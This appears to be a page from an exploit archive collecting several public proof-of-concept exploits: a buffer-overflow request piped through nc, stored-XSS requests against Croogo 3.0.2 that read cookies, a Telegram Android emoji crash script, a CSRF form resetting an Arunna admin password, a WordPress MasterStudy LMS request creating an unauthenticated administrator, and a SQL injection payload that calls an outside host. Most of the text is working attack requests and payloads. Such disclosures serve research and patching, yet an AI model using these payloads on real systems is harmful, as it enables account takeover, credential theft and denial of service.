BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v<br />125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730<br />Content-Length: 923<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="file"; filename="file.txt"<br />Content-Type: <script>alert(document.cookie)</script><br /><br />Enes Ozeser (@enesozeser)<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------114221148012003093972656004730--<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==<br /><br />POST /admin/taxonomy/types/edit/5 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 590<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)admin/taxonomy/types/edit/5<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&<br />comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&<br />format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==<br /><br />POST /admin/blocks/regions/edit/3 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 336<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/blocks/regions/edit/3<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==<br /><br />POST /admin/file-manager/attachments/edit/20 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 363<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/edit/20<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered Android application<br />vulnerabilities in the Telegram application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />================================<br />1.1<br />In version 8.4.4 of Android Telegram application, a denial of service<br />vulnerability was discovered by H4shur. Vulnerability is in the emojis of<br />these messenger.<br /><br />1.2<br />If you send a number of flag emojis with any text on the chat page,<br />clicking on that message will stop the program altogether and avoid<br />providing services.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br />For security demonstration or to reproduce the persistent cross site web<br />vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the python script, it will create a new file "outputbufferh4shur.txt".<br />1.2<br />Run Telegram Android and go to "Saved Messages" or any Chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..."<br />and then type any text to this message.<br />1.5<br />Ops...<br />Telegram Crashed <3<br /><br /><br />script:<br />bufferh4shur = "🇮🇷" * 114<br />try:<br /> f=open("outputbufferh4shur.txt","w")<br /> print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))<br /> f.write(bufferh4shur)<br /> f.close()<br /> print("[!] File Created!")<br />except:<br /> print("File cannot be created!")<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br /><br /><br />Credits & Authors:<br />==================<br />h4shur<br />Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur<br />h4shursec@gmail.com<br /></code></pre>
<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF)<br /># Date: November 29, 2021<br /># Exploit Author: =(L_L)=<br /># Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/<br /># Vendor Homepage: https://github.com/arunna<br /># Software Link: https://github.com/arunna/arunna<br /># Version: 1.0.0<br /># Tested on: Ubuntu 20.04.2 LTS<br /><br /><!--<br />The attacker can use the CSRF PoC below to change any sensitive user data (password, email, name and so on). <br />--><br /><br /><html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr><br /><tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr><br /><tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr><br /><tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr><br /><tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr><br /><tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr><br /><tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr><br /><tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr><br /><tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr><br /><tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr><br /><tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr><br /><tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr><br /><tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr><br /><tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr><br /><tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr><br /><tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr><br /><tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr><br /><tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr><br /><tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr><br /><tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr><br /><tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr><br /></table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html><br /><br /></code></pre>
<pre><code># Title: WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation<br /># Date: 16.02.2022<br /># Author: Numan Türle<br /># CVE: CVE-2022-0441<br /># Software Link: https://wordpress.org/plugins/masterstudy-lms-learning-management-system/<br /># Version: <2.7.6<br /># https://www.youtube.com/watch?v=SI_O6CHXMZk<br /># https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6<br /># https://wpscan.com/vulnerability/173c2efe-ee9c-4539-852f-c242b4f728ed<br /><br /><br />POST /wp-admin/admin-ajax.php?action=stm_lms_register&nonce=[NONCE] HTTP/1.1<br />Connection: close<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr,en;q=0.9,tr-TR;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4<br />Content-Type: application/json<br />Content-Length: 339<br /><br />{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}<br /> <br /><br /></code></pre>
<pre><code>## Title: Child's Day Care Management System 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` in Login.php app, parameter from Child's Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. Also, this system is vulnerable to<br />SQL-Injection-Bypass-Authentication<br />and XSS-Stored attacks. The attacker can be receiving all information<br />from the system by using these vulnerabilities! Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
Archives
Categories
- All Exploits 4291
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow